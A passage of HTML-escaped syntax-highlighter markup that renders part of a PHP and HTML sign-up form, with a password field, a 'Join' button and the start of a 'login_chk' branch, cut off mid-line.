inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;td&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;PW&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;td&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;td &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;colspan&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;2&quot;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;input &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;text&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;upw&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;upw&quot;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;td&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;tr&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-30&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;tr&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;td &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;colspan&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;2&quot;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;input &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;submit&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;value&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;Join&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;style&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;width: 100%;&quot;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;td&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;tr&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-31&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;table&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-32&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;form&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-33&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-34&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-ta&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(255, 0, 0) !important;&quot;&gt;&amp;lt;?php&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-35&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-36&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;elseif&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$page&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;==&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;login_chk&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-37&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$uid&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; 